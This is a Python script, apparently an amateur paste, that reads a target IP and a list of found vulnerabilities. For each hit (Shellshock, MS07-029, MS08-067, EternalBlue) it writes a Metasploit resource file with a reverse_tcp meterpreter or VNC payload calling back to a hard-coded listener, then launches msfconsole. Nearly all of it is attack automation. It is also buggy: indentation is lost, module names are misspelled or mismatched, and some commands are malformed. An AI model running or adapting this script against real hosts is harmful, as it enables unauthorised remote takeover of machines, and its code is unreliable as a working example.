import os #searches file for list of exploits#if found go to X else keep g

1. import os
2.  
3. #searches file for list of exploits
4. #if found go to X else keep going
5.  
6. working_dir = "/home/Desktop"
7. target_file = "IP.txt"
8. Our_IP ="192.168.1.200"
9. hosts = ""
10. print target_file
11. print working_dir
12. global Host_is_set
13. global our_IP
14. #global working_dir
15. global Target_file
16. ##creats exploit file then ran via command in func below
17. def CVE_SHELL(hosts): #name of function and host defined
18. with open('IP.txt', 'rb') as fp:
19. hosts = fp.read()[:+12]
20.  
21.  
22. os.system('touch /Desktop custom_shock.rc') # makes file with bahs command
23. os.system('use exploit/multi/http/apache_mod_cgi_bash_env_exec > custom_shock.rc') #metasploit script shit
24. os.system('echo set RHOST '+hosts+' >> custom_shock.rc')
25. os.system('echo set payload windows/meterpreter/reverse_tcp >> custom_shock.rc')
26. os.system('echo set LHOST ' + Our_IP + ' >> custom_shock.rc')
27. os.system('echo set ConnectTimeout 30 >> custom_shock.rc')
28. os.system('echo set AutoRunScript multi_console_command -rc ' + working_dir + ' >> custom_shock.rc')
29. os.system('echo exploit -j -z >> custom_shock.rc')
30. os.system('echo exit -y >> custom_shock.rc')
31. os.system('/usr/share/metasploit-framework/modules msfconsole -r custom_shock.rc')
32. return hosts
33. host = true
34. Host_is_set = True;
35. ##make exploit script:
36.  
37.  
38.  
39. def CVE_2009_3103(hosts): #name of function and host defined
40. with open('IP.txt', 'rb') as fp:
41. hosts = fp.read()[:+12]
42.  
43. global Host_is_set
44. global our_IP
45. global working_dir
46. global Target_file
47. os.system('touch /Desktop CVE3103.rc') # makes file with bash command
48. os.system('use exploit/windows/dcerpc/ms07_029_msdns_zonename > CVE3103.rc') #metasploit script shit
49. os.system('echo set RHOST '+ hosts +' >> CVE3103.rc')
50. os.system('echo set PAYLOAD windows/meterpreter/reverse_tcp >> CVE3103.rc')
51. os.system('echo set LHOST ' + Our_IP + ' >> CVE3103.rc.rc')
52. os.system('echo set ConnectTimeout 30 >> CVE3103.rc')
53. os.system('echo set AutoRunScript multi_console_command -rc ' + working_dir + ' >> CVE3103.rc')
54. os.system('echo use exploit/multi/http/apache_mod_cgi_bash_env_exec -r >> CVE3103.rc')
55. os.system('echo run >> CVE3103.rc')
56. os.system('sudo msfconsole -r CVE3103.rc')
57. return hosts
58. host = true
59. Host_is_set = True;
60. ##make exploit script:
61.  
62. def MS07_029(hosts):
63. with open('IP.txt', 'rb') as fp:
64. hosts = fp.read()[:+12]
65. os.system('touch /Desktop MS029.rc') # makes file with bash command
66. os.system('use exploit/windows/smb/ms07_029_msdns_zonename > MS029.rc') #metasploit script shit
67. os.system('echo set RHOST '+ hosts +' >> MS029.rc')
68. os.system('echo set PAYLOAD windows/vncinject/reverse_tcp >> MS029.rc')
69. os.system('echo set LHOST ' + Our_IP + ' >> MS029.rc')
70. os.system('echo set ConnectTimeout 30 >> MS029.rc')
71. os.system('echo set AutoRunScript multi_console_command -rc ' + working_dir + ' >> MS029.rc')
72. os.system('echo use exploit/multi/http/apache_mod_cgi_bash_env_exec -r >> MS029.rc')
73. os.system('echo run >> MS029.rc')
74. os.system('sudo msfconsole -r MS029.rc')
75. return hosts
76. host = true
77. Host_is_set = True;
78. def MS08_067(hosts): #name of function and host defined
79. with open('IP.txt', 'rb') as fp:
80. hosts = fp.read()[:+12]
81. os.system('touch /Desktop MS067.rc') # makes file with bash command
82. os.system('use exploit/windows/smb/ms08_067_netapi > MS067.rc') #metasploit script shit
83. os.system('echo set RHOST '+ hosts +' >> MS067.rc')
84. os.system('echo set PAYLOAD windows/vncinject/reverse_tcp >> MS067.rc')
85. os.system('echo set LHOST ' + Our_IP + ' >> MS067.rc')
86. os.system('echo set ConnectTimeout 30 >> MS067.rc')
87. os.system('echo set AutoRunScript multi_console_command -rc ' + working_dir + ' >> MS067.rc')
88. os.system('echo use exploit/multi/http/apache_mod_cgi_bash_env_exec -r >> MS067.rc')
89. os.system('echo run >> MS067.rc')
90. os.system('sudo msfconsole -r MS067.rc')
91. return hosts
92. host = true
93. Host_is_set = True;
94.  
95.  
96.  
97. def MS17_010(hosts): #name of function and host defined
98. with open('IP.txt', 'rb') as fp:
99. hosts = fp.read()[:+12]
100. os.system('touch /Desktop MS010.rc') # makes file with bash command
101. os.system('use eexploit/windows/smb/ms17_010_eternalblue > MS010.rc') #metasploit script shit
102. os.system('echo set RHOST '+ hosts +' >> MS010.rc')
103. os.system('echo set PAYLOAD windows/x64/vncinject/reverse_tcp >> MS010.rc')
104. os.system('echo set LHOST ' + Our_IP + ' >> MS010.rc')
105. os.system('echo set ConnectTimeout 30 >> MS010.rc')
106. os.system('echo set AutoRunScript multi_console_command -rc ' + working_dir + ' >> MS010.rc')
107.  
108. #stopps working form here
109. os.system('echo use exploit/multi/http/apache_mod_cgi_bash_env_exec -r >> MS010.rc')
110. os.system('sudo msfconsole -r MS010.rc')
111. return hosts
112. host = true
113. Host_is_set = True;
114.  
115. if __name__ == "__main__":
116.  
117. with open('exploits.txt', 'r') as searchfile:
118. for line in searchfile:
119. if 'CVE-2014-6271' in line:
120. print('Omae Wa Mou Shindeiru')
121. CVE_SHELL(hosts)
122. elif 'CVE2009-3103' in line:
123. print('ooh senpai UwU')
124. CVE_2009_3103(hosts)
125. elif 'MS07-029' in line:
126. print('ITS OVER 9000')
127. MS07_029(hosts)
128. elif 'MS08-067' in line:
129. print('ima fireing my lazor brawwwwwww')
130. elif 'MS17-010' in line:
131. print('popping the shell')